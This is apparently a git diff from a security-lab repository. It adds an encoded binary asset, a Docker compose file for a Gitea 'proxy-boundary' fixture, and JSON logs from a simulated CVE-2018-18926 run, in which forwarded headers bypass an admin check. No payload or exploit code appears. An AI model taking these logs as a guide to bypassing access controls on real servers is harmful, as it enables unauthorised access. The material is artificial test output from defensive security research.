zVi&>9)Vopvk)qyXJLLTm-##UusCRXD({~O^1pwq{w;DS(P_u<|;Ew9uf$i=yQ##<m
zifKQPnkx?g_#kwY<yq%NeLEr~IXh3<nD`8<wBvv6ej}%TO+^HAkh8P%(AYTin5wVb
zbX^};Z)89WcNK7QYv$``o)Cl+vU6}miupxFrOWrC$~WZqHR^q=d3j4dMr2%G8w3M8
zATDsN>rL9Xp7?!W6U)=cw_HOZzwp|AJ^pp|VU8v=Wa%GX8?u?KNq^T)i^O~^hrd4-
zrY<j?<GVfI6Z&+(A1?uTWV2NCl3{n>hchcNacs|VEiWu&deyf_jDwGC8-e{TC}=l{
z<hzN7Ne&ps6?RnXp2p$g(~5W<+<V2$CdcNUB;t7n1<RH-_!z10a9dyX!Fzw%8jybS
zP0ViU{QPS7JeVz#`Jv9QJSkkcww5YA-p?tSD1cZGApQjK-&lTIaA@qY8ci?IM$b}R
z<{LH=^WI+w%jOAt0p6cgB9S9#%xChy@4Eh$l*<6XfkZx<`MQo^BAWYf8h8EtJY=aG
zZrsNoDx_~1L1Pcy24?|xkj~zU(Bk@pXBfTIWSR469(hEN5QiR*EdUk!pI6Dtw6`+{
z(>`+E`Uxcv$Au0$4qUv|YTFGLN5^fj4$3xtGrE{=`j5>`Iw@0$da?w8_;Jm2=!tr+
zw$_owSm{)QpHTWhPhx_@Y+Lk0#QcO%`DX#|*~Kt#XjjubE=3}{BbZ&k4cOXjP7t>t
z5gKZ_8WM+b@=EHRBnoMzb%qTDbH|mHjDUYQ`YK*+a+_M9rrdR7-SYS+R~HbBId$&~
z`JM^4_(i3hf~_x|Cl47$*NLU4YwW+#cy0<Hf}i<1nHdU{Y+?ojOhI5m`obv3G`DaN
z5yOj#Sx=xbgBrN3;1z^+UTE{9H>m6Vy4W@92y{~IYL_PHJLENy-&my*x8_Rk1aGpa
z`;q)pHLz*DtgNz{tg%L)T?9uLm8e%}T-+!aY6|pgS-pYiF4KfW@WbUjV*7&5pvH6m
z43^n?&B}9kS)<YcXQ_2`ltnhO4Xk+r-pi{W37M%=C7o%7jHlmm1MvfrXcHToVSo&S
zQCcnuy5Oi6L{s!9w4Y=ec&OGz1my>HkCc1oXs7pwHk<;^$Ro#LzRP}kHd`r4lm#tA
zGQYDFVKUW8pi|;f8<T1Ne#=xgnmxm-w=r<}_Z{!5iV6z+LueE2OO?pg$PXXRF!^X~
zHg6U}BXSe{{=D<W3+*(8#44}K{*GQ!wrE7bXMt<8ow+AezFQ6$<1Pm#VzWqS<h_^y
zPa7D;D1^)oic*i618E~fy|s}v0vDA2qXn##F7eLQS`0`ow=xA$wjDRisDhD{(cTrD
zG2q{~7??-<T)Zr|`OU59F8B$oer3JCvAvbv*?-@9tgApzQ1aWS`xaZJTf{kK2sDdl
zuouCJcDYrC!gpvg)GoDR7O@>G{n62}JeRA<C>t5U2Uwx#0%EqPi2YA7oW}<T<KQK^
ziVx<2cwX~5`-DqZ3Bk^KKkY0(KkuzIZ5e7innksLY|OG_mOR4~RcyMp`SLi(0Pq;O
zY6W+uyieY-bnBF^4dwc_s}P@@o-$rUps#f|-WcwR+ctUbaOd&qJ=|xrWDOZXI+1_$
z4_HUtB9m6vP_Cb13Z6HrOGixPy4I6&eZjS~@Yp`Uk%I{L`<!e9%)4L|SNm%G&=dDq
z`(X|-m+}L!rECd$tUd$qp3CYlj@_xd64&-t_@$2k3)~7_=t_ygYfDR`|I_Z_xH+A^
zGHes7`R!tF^pKtY;#WT@;2q^ygQ1S4d#ouM>=fC2z}7%M`)KUxvY{$wGg{;PxL%)=
zle3@wr6%*8NL^z=ev5u!o5<7N5Ur}H>Wb&~-0Yvz6FiNmH}qLDT8*{GU`#yMhjObU
zCFv!CA9x)YI&Wpj$1&k?Cnkbr<QA7cRXZzmkx)IfT<uA$j(VM77D6uaG$5=03=qH8
zsMBNUWB#e61C(@V;`3cSxH?dqDC#)8uwwq*!}F*sss4pN6g$azP5+|h4~~jL<|Ufg
zw3qrkExGT<*c4XmTUBZSmbf#p4rwEE*)B*4MsDaHbVhRo5-@hWImP8M?J%*hum@1P
zzV}hB?|z+mNI|8;0(5P!HNKale3-+AI3HZ%r51E5E-s__S?CHZmApLm+L{{hL;|C2
z7R<5=Nqp^H<0l<+Y@M2U%ai#fvp*7rTq>)oDi~cOif)h#kN5PHSyvBVc&W?neUulP
zA$6I@a`u~vjg08w!TNY5BJcQ;1^KG9Ton6cl|rZELeKfJZA`W*bBA`F+m!L~O>mlJ
z|N3Thy3lLzNbu3GUt_xU_9a>+8q3{NX{tcwHI=0icDqIQw7K`?1KtFImpNT;yUxI_
z=8sS742&QP+Es!_j`LO!GSgNHsH>S2;>t`mz2bgDXFbwpLLbtQ$8DHfGMlZVuEOLu
ze<4~v_K}1>0Tc`qLjknMXRT8elK9Pe1w(zx><#5qd3VLd#f42XKg?FI%1x`I^1u5^
ze*gUKzmZI4v-CjZ`7wq$=$}w7D)xF|Xk`Qxw;$JcQ*WqRhRenVQa#koP%l>9nzf1J
zF{^;S`hX!sdaX$y2dWI8W)R)CnTz}9h|T}@;pNW}s|&}6U9%qvTV)4VQMSJUIpN{7
zF`nufvjSksT2G~n<zJgKI^{O|n}-ja+FolTbAl-OSt1FU<b>=~p22z?nI$C(?Oxeq
zdLiz=!v#=tZLvs}F#mm8(N}uDCPs>1guS;I_RSP1Z&He~s&^3a+l*uQ$y?waT;sN0
zPSdS)SR1QFb@cPVJ`4#)p?dCQg*{=Ch%YDcyjeE|hgQvCXQz(d7)SiWo=BFa;yJdt
z-*27rUwo~}%#67-7M40*?R3^U-Z%}ub(N0EVpG&R8P&Vb{<@Etk1V&HTu0TTyT()W
zYXxDj0}1;JD`Sr|kEHuXZ|6ESU=xGQA@CU*{FS&u{gsaMq#POy{t*$zZ6_B|<%k&y
zJEM~-XUcS%FZYcaD;-IN0lS9wMRkU~2l5gGsT}tbCLr|+Ivl*(B=|A=`Y%CAt)Ajq
z4j{Hd6Ya&LeIObYQM~rk!v+&_#}^Tuly_H6J0r#Apv$>4j2`v<f;c8Aj|Cbr+3pI8
z*Y?Xe&h@Css-!VV3RaCApRMKwFKB_pf|n1t^cxmYOFOo+=QJ{#cWBaOW0I{9+;7n=
zI#oWk+A#Ydl!)7SHuiB-40c{(zTS`}^7N$cnjtKBR}_817GZM`C37<N_%!f<w(P-c
z&4VX8>7TGj(J_+Qb8vJ>vCn0ZDHjt=-k-VBkIWoaVRchZm5jQgUG#RU)TsV-mR6cH
zUAtL$z#Q3=q)CyyeCxChW_4A@!FWE4drff<EaC~6!V?2X*&G0(-yV?(->Q@`VBc04
zNm!?*etxC5Mc1)um;RaX+=q13yf+TAHP3yTw&N3=>x`VTfQD1DR4ZhaQwf-LwLyoi
zNezG6+)ihd|03+JZ6+0ej8FEN$=WgwOREi4W?k=#@f6cDE0R?k&CG{gKt-vAn|H;c
zV0Q-lvzE5DfPjSUNL}iO4^lm!1t<m!t%b=|bfZ!V#>R7;g;)mJ{3*SIxI)DWFZ~Xc
zJlgA~gy9fr={sCT>UiIIytLT&*C&!5dKP%)saKno<;5{#X=dwA!FQgojf{wfO$=RQ
zA0#L!APt0*iBgLu(7D^HhHXBa9d#!d#ykeIC`nfmN5bg1`}Jb;-eUWi4Dg{rM=^{B
zK)_K9>?@J`du!U{<$=qF_fSVTmn2vkWTrbJxxK;8k)Fl)-k9+>NkePMTFBh;-MLn<
zZ<BHvNq-aw#LllAU9jGoO!OqUINkb*8Le*6^Z_qk$aQRA|1l+({`m8~rKLI3Se(|Z
zWhot<YFppdUap_p0CTXOI~|QMcU_;17=cSAeTPHcz(T<IAQX@n__W+rHnsjLw>0Xc
z+NXcmpz8?d7buBYbfqT~_z+0b6&IO$9&*LLRJJJ?QlOyHZZ%dKcEc;bPhjn<!2xT&
z)5(005uz_TKO`i?eveRP0>eDoQ(jJqCP~6y@IIQIvCYanlDn!|ZR|4Fp-vzr<Z_a!
zn&}HK<T>A^WkJrO(wt@B7)YT`nE|pV9_^&grE$g4W@(PIYJ8XGLVUJYr(oL7CVYu7
z-{<~)bJ<^Jck^)e_%KWM{H(Ubto!a^y^mjuPMM8r9f{LbVUL}IUqyuKIck=ZHQB~y
zeD>2s&@POHehPP4zE;WlZZ3biEU`hYr3H$QBkh-v$KW?SN{tSE7><)vcmm|NIv_Sa
z8wRRuj&+7o0t<^VQ1Rf-?*VV^qy4ac6;z4u`I(<ifXPFIMi9_De80Q*iFi79Cy6QT
zt!ib;lP3W<Qk`wYXGA2_ygRnWrMnn*T>p#(XcLg-TtnCQ{-nE@ezNl0u+X`<s3;6O
zG0xZw4tsdo_dSo-YvJdUTo+6fDYKbKv7foDBC@x)7rahny%z7hKEnh?96|e(cQ95&
z1>5GXHw05~_AYeBXy$a!&wmv;zw3Qex_5K$I*I?>l2i`3ZrVM&DTb(0#$q^C9Y*^P
zr#!jRWg;@=en;k<0W_#I8jbv;PVluehD{Zy34keYuX5X4tz@^%{w(*s<a+Y1`$A8x
zu7D$G%^C`8+7D+#JHk?1)4cmlWSHdb(8!mXiB))njPmzi9x+&(1|{7Wun2FyI^9Ys
zX!UN)tTWo0m{o(<XZL!=QjABS>0s8^I3Ck1gF;1sse)nD#5iq%OE+MNs;QeJE-#y1
zi?{O$mGh>oRoVS>VK~(AetKQ%wb!KuTnKQ~Max8SbdPn&;`J(1ucB+b;frWUlL?n@
z811qnFE$c<s*P>j_Vc#NgM#OEs~u5@8gDO5fc1i2d-}k%Va;4czs(s*8BT@J<btvO
zrY3RL&kH>U&&3M#OA5?;Il%#CGghN+z5RPC6&MPUY?>aQj~8xj!K4EH+N135>m-~u
zV`)Y}b4hz9VA9q`Q+u?#+~?f2IAu8k9h5<20vZWeXr-jy+q<V5CVk0YYTZ~GR=ZaW
zIb{F~ihmRu%LL$uJgt1Yuh@Xj{Id&+zHj#z5mfRU?;#q?kph-Ne%r}tHUlkDPVJgf
z>9D8QNxPJ>ZEzpj22brwtc!T;ub>digCAwTzfTO0hZ~5an@uyXKqY;;gZNYWD)SPj
z&j}pULu|p~ot%A5Fq<Gc4Xa|c{#fmOLoD~q_FS)Op+1NE;o%{*m_4iPETDjz`#r97
zH$IqOSs}gen&cV1RY&#XFIurL@8t87HuMf;ACJ~cd@>_AOdA%l3!S>s27uC`_~jP7
z+&S;f@VVv07QvH&cJI|T&cySm7-Q*!%nvuI!@#Uv=Y1nHwe=&ZW^j$Pyh7-mH?vbf
zy^!q$NQUdHk)!p~V{p|dKP71rkj#zlHtk5K5%!9u!$()xs}5U8)2rXW|4U!9Qsq#F
zaAHnJ#XOpBXL%HWmz3G6nJU;cdz9S9mjq_%xJI!q<5S1odC~}zQrcIVT0<Nv(w=|C
zhCKKSkF(^tPpu}q0mH>guQ^!<e*U;QpwYZ5y+kD5a1yl>cmK&-i-EWG{BGY82%)U~
z<-duf1sEA+kR!XspxQ%WE8m_OY#eeVy{H;f9hjVg?ak(#6RAv1RWMPpx!Ct|ph+p5
zp(t_$d?5(0JqtH^muGAUHbN1rv2XLUO9SBl)~I8&9L)0ZsS6JX(rIyW3BJWWJyGq-
zaE{<eA77YWCRo(fcquw5x&c5l8+z04092qBaLAMBbb-+_x0_h>$1Bh^Ax>n{4cl!~
zwSdFrRC%Bl(u-I1hcVA)vb0RHy9zx{6DSc##;w6Vf-1N9kZ~5rYaV>z)RW(8@MOL_
zL3Z(xprFsep9Z$y;|I3EgY7I;R9CK;GHR5O1DP<Hmr~5<<amFB+?JQAEizB9#B03<
z=gpU%^s7|@pg%q)U{Z2CoyNhbdV)hHChM>SrZB&?onA5juK9IQ?pMtDvL_15INxR6
zws*E}@?k;Ik{vjMD$OOurMlH-;;$|fuMPyht)&lh4P_JXQ&dmpQ_-mPIn4l~eh0qi
z(N0`VWKuFvJ^A>C<;3+;Z&v+5m2wkVc<wA7t*=$X9q7*^DJxj(u{*}^38{o#SmXQf
zO2()LCfUgQI~NX2?MU@LJm?3^8rxTre!_2q5jb@$Mvd<{v>(_zJ4emXzv=nJN8<Fi
zo+JQxf@sK|%sOJvrT`p9Bdm5NEZT@-esx*Y`AB|QEgLddq}iJPPv&&HsWsEstj8QM
zEkzxvZ9UhkQD~zeCRPt{*bl|$$=A`1U8{rHyt0pfpu}_wmH2LqkJ~A)53%_VT3T$L
z+s$0O-sIdeA3`e<t(lDaX7ToKQOzkBMvl#yf5xUJ(9uDaTBxD{&N?-+AaO3hKst(&
zQf?Hmejip}KQ-LyyCjhS*rRPAy8vJD>v_lD!q~|W=Ax}904EV1vEd0jIPIi@sZ`Gl
z>wJ8;3~I~DqGi*N@6)G(Ydg4Lj@rU;`v|HPg*xWq9B$eiM*K$$NECF}K2-E=Y&<{T
zJ}-i=8S6y&lHp=vIUQ#xi4Q)BD1=WR#{Z)>BzVRDFHWZh7=RV^54lVA@DQfyZOyi?
zfjD%i;IsVsY_C%Mzwlo0q`z$eOZezlx$AM<fYkDEzC~5}KVUA|LmH%|x{&?J<AgGf
z`V}3RT|*1%4mg=RYzh1Y@M<sBd#?LbU%EP-uT{IVligH26veJ3e>ex&6pDu)S)jbW
zuEztTFDuBQ$|=vH{VmnmSf;wUwI2XX<X4d~%XeRx$%H{@Mdc0$Q$5@Rgcex0v2F=s
z7@k9UGUC3z=S@<<roGXO(Yc*|A3`Gk%!s-)=0qU?*;9yhE|b8y2683F_y+&&^#<k^
zY#tk9)jKMMErW*F?6VgTE#mA)K!LMCm7T$RlnPm;6kV0mg^Pc*+|@G^ric~b;;&ov
z)qE6J^W3c&21Xf-ujudUlBaHL#3=#ya4H#VSJa#i0E%JCPU?=!$*;4%RR8Q+oX-A!
z<Ke(|o>En2{CtCYmBz|p765WAKTaE%56T7Nt13z}TSZy&Ht@LedtriE-ixBegqQdh
zig=&eTC~l~dkgZ-6=}n4LC<TNY|z)a!ULcg_Gm7eN8eOMDUw#Hf#vaE?5Q2c5g_@H
zOGkH+BPRn$SQxBL>W1_6CSl+NY~Gzj9g8j-<HlZ5#R)oaX3L}%ER|#0f{0k_={h3l
z{0eQh679T2Y$4_z?g?D#3>2<<u?csa_tN&CuM@C0^458jDXh%%%<%L>goR-^ybfv7
zmY#8AK%=Ux4hh{`9yIGQiOmM`ciU=3RWo1-A}+5Xfs32`NiBW|$@EF0jN78baUp|B
zpxCrKUhDEb`Y4IMEM;$NV;-{(43Ek=_gASsysAv8BBY2D^}ZjxB>W+2aA5LKUuK9s
z()sa2-QC@!9Qq!hlK_L4=w7Ji3K5VK+SP)UQ*FjdO;7z5;OyQLCXz6QnSlq&<o|<J
z#E@b&{*ARtbqCJuZf+j)?TNYG)x-VfYPh&d13!M;D)^k3m{zG-XahS6*y^{pw`2N{
zR(%X<77>Fnk7TB!*oIdps>NK`N7QqpLD9RjcAdCG%;qEuqGG;Ixe;nFQIY#I2}f*x
z26aqq4^O~9$R;uu=O7D@Ri=40`8Z*HvxWa4sQxI&4`v@-ZkBVVdtlLjN5AILNFf@;
zhiD|yd5D!5$u(SPAeFKO`;oYqt5Den-;ELr@qB<fugE6A-Y6&}1cPkoU~(R+Z0!Xo
zq<WWx_U-A1ve<8XAMMD5Pl2k>hCzI?MRKL;>#!LW+f2lVZ$k><4C)wM`B|HyX?sti
z*mOLA5vIWx4MIw-)20K=Co=1bB@*#)TEdhc;N`qe4wR$2mUzugvH7g^=@V4H_q+5Y
ziP`p0je^$dv%g-8;k~woL@R<c^baB{2}H)iv(}atCYRM0Pe_;6gj@%aOsZ@pF4N62
zT2kvTrP`hZg?ypGy-CHx&ySeMiKA#6NS70OIoA9tIJh-92{YxSE0&v-D?T^FL#8iL
z&?VI0v{REBm>1Tl=)IfDm?ZV&{UaO-v1i7yX}4vb^w(H)MlTQL5V6PFwgyjZ6>0Wz
zhQ9!D)phab?ZZdDXDRAzq?Eq<ryua=*wmu@y$-hmsd;s`bjnr_g+)ZtpU8&2zeY;-
za7<*83=ZC^Kuof*v;SD>J`fM%LW7g;GybwDDJ^B!ugMFPh^HJZq_0eWnYjmE@YT`U
z+~&-FQ&v$RD+|gTx^6ZK_+8%3eNj}k#nBKv(fnEVEkHm217|AZCgLqI;h`~`V?{EY
z$~OHM?kHVx$v`xkQ(ZTDEk&ZU4zUi$_;^u0?Il)p6eEZQ1VC+4WGpPRI4-;-W&xzi
zmW-fWK%oG^DxEco?bq0^wm?`h9YGm#7j)fP_#1w!U!Q?VYB5lyfGhBw4o@YxCx$;{
z=a$MbxV&-WdwkC<*yO5Th4EN23-r_3m%8LHZ_jhF>SPS&#uR=cV&M>x&U9JR9xBv4
zM*EI|7^Qt`liI=o^cH$N7?CI!!>5oDxP*I?f{8X=m{LGC(*K-8C3`;ym*p*If0^}-
z)6c^8vctg-ZqN*tgLtcyB*Lbg^4aKW42wXrK_Sc_l$oZ!pIpwKbd5MS*C0|@*nDpg
zzybWWePzxG^Tqc+5pkaO&7?Y6j;3UrSp6Lb=vcpB5y}phy(w(JRZ3w9!eBaC;|o1x
zu8spgEiLUs!fWlsZ~FWGC#mOF+E3;sO;On{x6Q3|kC*w$^F2CQe3;`dh}(P0PxF4X
zV-0!Ti_X9Q%t_|C3WL*Mmgm2x=;3)-<T~s?F35fN^xI2*?o7ybx;`^%f~q|+9xgkM
zDOqgC^wLWN-s3`kIL4>R`6yRWtrY2s^kM7d^N$z+)G7=+d@AO;RcEqvO{QKwhs;J=
zqgv7VsxzF3lszLpLeF%l_704n8*E%UIsC+H+JiJ~m=28NQOkQ?X3{=gd<_z{2t^p@
z5Vb#AlHsy4rhIJz1kT>@hvi**(rXtL(z-J8q_oDgGXX7ola||K<Lsh}Sd0a##5SpF
zlgyvb{7cP3SDfDIy@<>VgCh5B7k8z|M@0nJT0W^EoknGmMguMRTXp99qPsKE-Ton*
zoc<-P=>cbeibEjSv{bjYc6M%MtE2}~F&1}$l#GEfk#Ol}z<u|7;~5T_(MV3zQ~=sU
zCOl93P{3FwRwj<8l8A<pLt1%rGa|F))S%8wqBdOB`TXqSnoeC^9aQl?DouXT2M}FD
z@D9{%w736Z`()w`htao|&b!*8WpthF?Ch?$IcF+<;alGZ4FHb5kyd$La_}{XWDezM
zM6+fwusJIZb^3GUiJtH5ZHOg%%k>w(D+epStVpE=q4*6NF`wcs5l80k?Rkz@L&X-z
z9AXR_rND~iYHjD)Ctn_~89JEG!Yls$_633U`zF%9ETXvs8H#D~1puDm+<2Iyo~?}x
zuVJ_wOtV&Jxmy)Fh8y3;AcGe+<Yv+NozYfKyr}X0toLzQqIM>1L~YX4)YL;EDw#uq
z0G!w1*0rO_sn>*MhL)NI;gjWEguCzA^!uYe6iO-x-A6@j8V$8kb}ixFgHL>XJ|77g
zBmEs0dJ!CRi-9hSkWXUylEQ^v?d85L?cIMI;hNTVduRm3Z_6nC;MH@Tt6BVlf`VlG
zwqBGu29JX{S>tkG_^Q{zpC<|vP=e!G=T-dth~OOqZjSxEM&CItBXcJaJ8AhYi=0T7
zDyPF%RIBHo-?!bjNo8V0Q9zCkJl;82G&)gk{QA{Lr_%Tg+ufkn%loWRV$O43@#+<4
zh{lmQRsfU)ya_&yU|!UVmyd+V@f&^&NhGd--b~D;F$?1&RobFFkn(Bv2a$OR%m!i8
zj2+$aBE2mw05qb3T%5OW^4ARDXGHW*3UgLeOcWDY=Tcik(gm!?xcHmH$@#k^LV33K
zua!!R&p;Jy>kLLv$wnb4>N}zekM932n1=*&#6u&d?C-?!7I@UvD(s%X8O(WwpM+Ca
z){~f3Mdhx2<(6sM2ly6cSsqCS_I{PiiC?bFs1F3?N!zjD^C)9Ez*rX!w-*R*!>oaD
zn)FMogxQkGQWxIjzY2S6$=n{Qc%dA@)7|_znq6JKMaZIm5W`Y@uPSKT89&;b9L=u9
zWM2j038qo%*1AmW_aq*{h_~#3slc79TcQn%*cNeZ%^wLY2+4UfwxOP%Rw@0MyUe0Q
z1GKi7_k@t^Sr??2!RR?j#@~@k+%H@9S8OW=)TiDaid)jYx(ma2*-_&C3<frty2U0%
z`n6S2h0is@E4{i%?R;(3fiYvkS)gB?apC|)yMQW1#lDS+YTvanXLk{wEtARdCGpGq
zF;M`d&18_NqvCE)6pGobZKap`$lj-i>GMECcgcOrU*GNW3q4r#B&P>P9TylyfnMa+
z^=q@=tl_N|FmR&-(8Z?L<%NqE%|mPWotNK1!5Fivw*9=&FIijN|Nlbf(PffX`Rt^^
z6~+PJ86pX&5!?sz%qxItDwgAp<LABVYb+?>gtw(v?~`6zn@xE|PFL9J;IA};k0t||
z-70my>&;M&Nb_L7=)QMy7{z8V*WRu=p01d{si*CHccGhKcxq|3U3E*pMDpQ>tiANk
zNZm50I=)kY>3*c)82e`A*PkJyS1SE=_(DjfpzoQn^qQaI0>rYp$L*0UGwEdd_4;cz
z6N2q|po#6np>Rt!{Lv;5t0A641-L+IgQnl&`*)*`4G`t5;#L4x(MAPRh8>osE1}3F
z{vjw_5sEr7=_1x+&*FL@dALE|uX!9j)gb3tW{s|T^3Uov;xsmnwP-hfPyG-wNcb$M
zJC@rOXn;UkaXrY~uGoywL0Snq2hh>_>>O0sq8r959bb7L9r{+*M!3YU^B?+bT{lfq
z>17WU+vsQ9PS*->!$4a$f*uTe8>jsh#;Tcp-|>in@s49K0C3i{#r?xZwJKi81TCwZ
z9z~toJeV`w=}ItctwW4VhR*LaZ$`9+B(=qIH$kd!(f{1;N5?}rsO%ok9=pG;t9#?m
z=RLLx^KkWQ+(viaXV7&gTB6FR)pIm-D~*FTH4D%cOB)OPp7RUwf0iGvWGE!C;1Qgq
z6X;+BvG)E)KGSNEZDB84xyNY{lQj~D+w&|h?i6YeqwCLqwkYT@uw6!pE;_-WUVd4k
zW8KPPa~;FBZ58x7+V>lgHgS{Vmw3elzORrPY^lWPfa-}%h=}{ea00NGdM>@wlX`9c
zC#2bB!(ON2<8Ed>@oW}lD(PE}3lzaiZ4R*_o^@2Rq4PEq$IpT&9s-JFnYgi7y{6cW
zK3ktUMm{s7Fy!w@@#eo_UqTsx7d=qtxxIcAMA@-%hf(XJ2q~BDwLyU7>RNt<{b?a^
z9g!YD#prPKz@k96dT(|`M<>qASaHtn&5<3wEf-~_4Ko%Nez?rDCu$qEH!~Gb(J&h*
ztO<8{AWi<d#d<VnTnwaZyG1IN38_+h6Sbb@Ds%A=_9w!bfd*I+xe`?WA7%^leVjz(
zxPYUZhr522!>-<UtpPZFrE|W4Ivl{{C8n$FnOO=jl1odz&YShVU7Z)&+8IhQdl5++
zl_d)o6*2)G596w5zc&MNCkWM<_udR9t-cmhZJf0zFsMm>%nyU%w^lCRuNyf#6@tDf
zP`(S_MZsjwe4XJ$0nY-(L`iKq4lE3V;Q;@_3)_mzWCwn5w{yV}uLU3Xn%_<8v9{w#
z7G6xkjU}0dwQ`;Kx7cSQTS)j_r%ry*y7ya!Gkm08UAvgr^_f#|jFd}1ixdrO|5ySC
zp6)8iA6%#eEV=5rQRTr%DO~I9$zDwJ-A~^C|0I$w;>Gq%B~cO*s$I;xBpT&Do1IC0
ztOTEZdTz<W8j*{6xXRobu`oB6{a=qyS-eDK{`2@t#LC>%*Z=%`BWrOi4AT7uv7r+7
zx1L+CcYmNdJL9im+Vl*wuu$#mMc5*ASSz2Pv#heRGA=F-J}uT_Y+Plfv0014w;g}1
zJRw{C+R~8uG|cl0&i`KA*&C9>!Qk%`HDRJ>pp~t4Q*AQDjAYf}GMC$TC46>I-eV`i
zllG-nyC%MD#Sp@=^uiOTKJ2fv{G`2(lKzaBE9B$jV-`Tb?LZU~vVrNwd#ptDvck*j
zykVvZ7w1SE=S8M|y_bbGDV<7W7Dg*crVOK|%D1*c*UT;(B&J~J8Ej0}d?ew`I5`s$
zeU6K1M?4qHK9$8=oSLY<wiAGrhX{X@Z)NrQ<&WKygUONo2+Sut5i2f3ItC>j%v8hS
zUsyT$<t4+~?X5p<=j+y8zw9|U^3$}GPcZN2_xby{O83E6+^f{7Vl|GfGc!^+M`mUl
zpPybJVzew>+zSo{V21t|n#nIT`oOtT)WS4M`jTG1E|<MO_G?TVB^m1aqib~y%H;Zg
zn(4`akxnef#&*bS<TgrvW+|=p0+Sw{(LmWjnxnO|scE2T0M)r25fXxZ(yDSHu#NVL
zySLjuW_~x;>vOJ4hVUEfH7BM|6n?6J^N;zxi2c8fmHGD>FbkG^{oi%?cOCw{asCY;
z|BFD1!I>rF{u?O%4HW+dihl#e{~}Pp4f1bFhKZA}&x;IjF&Q@2+mn3UN_K3+Czxe>
zaSQ$qi{ujI#;<WMK*sv-!~Z*L@*WoL{G6WkEE)cA8FM<nh-DsXu^aiSLkk|kl95n+
KR`AsD?f(E#Hy=9y

literal 0
HcmV?d00001

diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/compose/compose.yaml b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/compose/compose.yaml
new file mode 100644
index 00000000..b37a1fe2
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/compose/compose.yaml
@@ -0,0 +1,26 @@
+services:
+  app:
+    image: python:3.12-alpine
+    networks:
+    - labnet
+    ports:
+    - 18101:3000
+    environment:
+      LAB_FIXTURE_SCENARIO: /workspace/00-environments/templates/fixtures/gitea/proxy-boundary/scenario.json
+      PORT: '3000'
+    command:
+    - python
+    - /workspace/00-environments/templates/fixtures/shared/python_fixture.py
+    working_dir: /workspace
+    volumes:
+    - /Users/x/websafe:/workspace:ro
+    healthcheck:
+      test:
+      - CMD-SHELL
+      - wget -q -O - http://127.0.0.1:3000/healthz >/dev/null 2>&1 || exit 1
+      interval: 2s
+      timeout: 2s
+      retries: 20
+networks:
+  labnet:
+    driver: bridge
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/attack.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/attack.json
new file mode 100644
index 00000000..6538e5c3
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/attack.json
@@ -0,0 +1,68 @@
+{
+  "steps": [
+    {
+      "kind": "runner",
+      "tool": "gitea.proxy-boundary",
+      "status": "completed",
+      "status_code": 200,
+      "result_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/attack.json"
+    }
+  ],
+  "success": true,
+  "detail": "trusted forwarded headers crossed the boundary",
+  "before": {
+    "status_code": 403,
+    "ok": false,
+    "body": {
+      "ok": false,
+      "detail": "admin boundary still enforced"
+    }
+  },
+  "attack": {
+    "status_code": 200,
+    "ok": true,
+    "body": {
+      "ok": true,
+      "detail": "trusted forwarded headers crossed the boundary",
+      "case_id": "gitea--CVE-2018-18926"
+    }
+  },
+  "after": {
+    "status_code": 200,
+    "ok": true,
+    "body": {
+      "ok": true,
+      "detail": "trusted forwarded headers crossed the boundary",
+      "case_id": "gitea--CVE-2018-18926"
+    }
+  },
+  "proof": {
+    "status_code": 200,
+    "ok": true,
+    "body": {
+      "success": true,
+      "detail": "trusted forwarded headers crossed the boundary",
+      "case_id": "gitea--CVE-2018-18926",
+      "sink_hits": 0,
+      "uploads": [],
+      "events": [
+        {
+          "event": "seed",
+          "detail": "gitea--CVE-2018-18926"
+        },
+        {
+          "event": "attack",
+          "detail": "trusted forwarded headers crossed the boundary"
+        }
+      ]
+    }
+  },
+  "assertions": [
+    {
+      "name": "proof-success",
+      "kind": "runner-proof",
+      "passed": true,
+      "detail": "trusted forwarded headers crossed the boundary"
+    }
+  ]
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-browser.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-browser.json
new file mode 100644
index 00000000..4639843a
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-browser.json
@@ -0,0 +1,14 @@
+{
+  "required": true,
+  "present": true,
+  "page_title": "Gitea Proxy Boundary Fixture",
+  "page_url": "http://127.0.0.1:18101/",
+  "error_kind": null,
+  "refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline.png",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline-dom.html",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-console.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-network.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-page.json"
+  ]
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-console.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-console.json
new file mode 100644
index 00000000..fe51488c
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-console.json
@@ -0,0 +1 @@
+[]
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-network.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-network.json
new file mode 100644
index 00000000..e2a9239d
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-network.json
@@ -0,0 +1,6 @@
+[
+  {
+    "method": "GET",
+    "url": "http://127.0.0.1:18101/"
+  }
+]
